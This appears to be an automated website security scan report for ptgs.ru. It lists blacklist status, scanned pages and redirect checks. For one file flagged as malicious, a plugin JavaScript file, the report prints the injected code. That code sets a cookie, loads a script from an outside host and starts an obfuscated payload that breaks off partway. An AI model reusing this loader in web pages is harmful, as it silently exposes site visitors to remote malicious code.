Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ptgs.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ptgs.ru/ | 200 OK Content-Length: 21406 Content-Type: text/html | clean |
http://ptgs.ru/mambots/content/plugin_jw_allvideos/gz_eolas_fix.js | 200 OK Content-Length: 1611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function writethis(what) {
document.write(what); }function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>');} var I=false || !!document.documentMode;if(I||F||window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$. ...[514 bytes skipped]... Antivirus reports:
| ||
http://ptgs.ru/index.html | HTTP/1.1 200 OK Connection: close Date: Tue, 17 Jun 2014 21:48:10 GMT Accept-Ranges: bytes Server: DataPalm/3.5 Content-Length: 176 Content-Type: text/html | clean |
http://ptgs.ru/index.php | 200 OK Content-Length: 21406 Content-Type: text/html | clean |
http://ptgs.ru/en_index.html | 200 OK Content-Length: 9521 Content-Type: text/html | clean |
http://ptgs.ru/en_about.html | 200 OK Content-Length: 6330 Content-Type: text/html | clean |
http://ptgs.ru/en_proiz.html | 200 OK Content-Length: 7541 Content-Type: text/html | clean |
http://ptgs.ru/en_press.html | 200 OK Content-Length: 6195 Content-Type: text/html | clean |
http://ptgs.ru/en_contacts.html | 200 OK Content-Length: 6071 Content-Type: text/html | clean |
http://ptgs.ru/test404page.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
http://ptgs.ru/en_press_news.html | 200 OK Content-Length: 6178 Content-Type: text/html | clean |
http://ptgs.ru/en_press_otziv.html | 200 OK Content-Length: 8728 Content-Type: text/html | clean |
http://ptgs.ru/en_press_photo.html | 200 OK Content-Length: 7509 Content-Type: text/html | clean |
http://ptgs.ru/en_press_video.html | 200 OK Content-Length: 6192 Content-Type: text/html | clean |
http://ptgs.ru/photo_gorno.html | 200 OK Content-Length: 12904 Content-Type: text/html | clean |
http://ptgs.ru/about.html | 200 OK Content-Length: 9264 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ptgs.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 21:48:02 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 21:48:19 GMT
Set-Cookie: 28ff5740c59d3f8b46d4156388d432f0=-; path=/
GET / HTTP/1.1
Host: ptgs.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 17 Jun 2014 21:48:02 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 17 Jun 2014 21:48:19 GMT
Set-Cookie: 28ff5740c59d3f8b46d4156388d432f0=-; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ptgs.ru
Referer: http://www.google.com/search?q=ptgs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ptgs.ru
Referer: http://www.google.com/search?q=ptgs.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.